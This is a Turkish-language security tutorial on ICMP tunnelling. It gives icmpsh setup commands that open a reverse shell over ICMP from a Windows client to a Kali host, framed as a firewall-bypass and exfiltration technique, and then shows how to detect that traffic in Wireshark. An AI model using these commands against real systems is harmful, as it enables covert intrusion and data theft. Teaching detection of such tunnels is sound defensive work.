ICMPSH ile ICMP Tünelleme ve Wireshark Trafik Analizi
Bu yazımızda ICMP tünellemeyi ve wireshark ile trafik analizini ele alacağız.
ICMP protokolü OSI katmanlarının 3.katmanı olan ağ katmanında bulunduğu için port bilgisi içermemektedir. ICMP hata ayıklama ve trafik denetimi için sıklıkla kullanılmaktadır.
Firewallarda genelde HTTP ve DNS protokollerinin yanı sıra ICMP protokolü üzerinden haberleşmeye genelde izin verildiği için saldırgan veri sızdırmak ve firewall atlatma tekniği olarak ICMP protokolünü kullanmaktadır.
ICMP tünelleme için icmpsh projesi kullanılabilir.
Kali üzerine icmpsh kurulumu aşağıdaki şekildedir:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
git clone https://github.com/bdamele/icmpsh.git
İlk olarak kali makinamızda icmpsh sunucuyu çalıştıralım, bunun için aşağıdaki komut kullanılmalıdır:
./icmpsh_m.py kali_IP_adresi client_IP_adresi
./icmpsh_m.py 10.10.10.10 10.10.10.20
Windows makinada ise aşağıdaki kod kullanılarak istemci ayağa kaldırılmalıdır:
icmpsh.exe –t target_IP(kali)
icmpsh.exe –t 10.10.10.10
Sunucu tarafında aşağıdaki komutlar çalıştırılmıştır:
Eğer kali tarafında aşağıdaki hata alınırsa:
Bunun için sırayla aşağıdaki komutlar çalıştırılmalıdır:
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip install -r /opt/impacket/requirements.txt
sudo python /opt/impacket/setup.py install
Trafik analizi aşamasında ilk olarak protokol bazında analiz yapılabilir. Bunun için Statistics -> Protocol Hierarchy butonuna basılmalıdır.
Çıktı incelendiğinde pcap kaydında trafiğin çok büyük bir kısmında ICMP protokolününün bulunması ICMP üzerinden veri sızdırıldığı veya ICMP tünelleme olduğunun bir göstergesidir.
Wireshark’ta “no response found!” ifadesi içeren paketlerde komut çalıştırılmış ve bu komutların çıktıları iletilmiştir.
Bu duruma örnek olarak 2245 nolu ICMP paketi ve 2247 nolu paketi incelenebilir.
2245 nolu pakette whoami komutunun çalıştırıldığı aşağıdaki şekilde görülmektedir:
2247 nolu pakette ise whoami komutunun cevabı döndürüldüğü gözlemlenmiştir:
